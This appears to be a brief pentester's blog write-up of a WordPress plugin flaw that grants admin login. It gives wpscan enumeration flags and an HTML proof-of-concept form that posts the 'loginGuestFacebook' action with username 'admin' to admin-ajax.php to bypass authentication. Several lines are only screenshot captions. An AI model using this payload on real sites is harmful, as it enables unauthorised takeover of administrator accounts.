Privilege Escalation - Hello Admin

Vulnerable Code
  1. Use the wpscan tool to check for the out-dated plugins, themes, default credentials etc.
  • --disable-tls-check : disables SSL/TLS certificate verification
  • --enumerate u : to enumerate the users
WordPress Scan
Vulnerable
Default Username
Exploit
<form method="post" action="http://target.com/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="EMAIL">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Then go to admin panel.
Python HTTP Server
Exploit
Logged In as Admin

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jerry Shah (Jerry)

Jerry Shah (Jerry)

|Penetration Tester| |Hack The Box| |Digital Forensics| |Malware Analysis|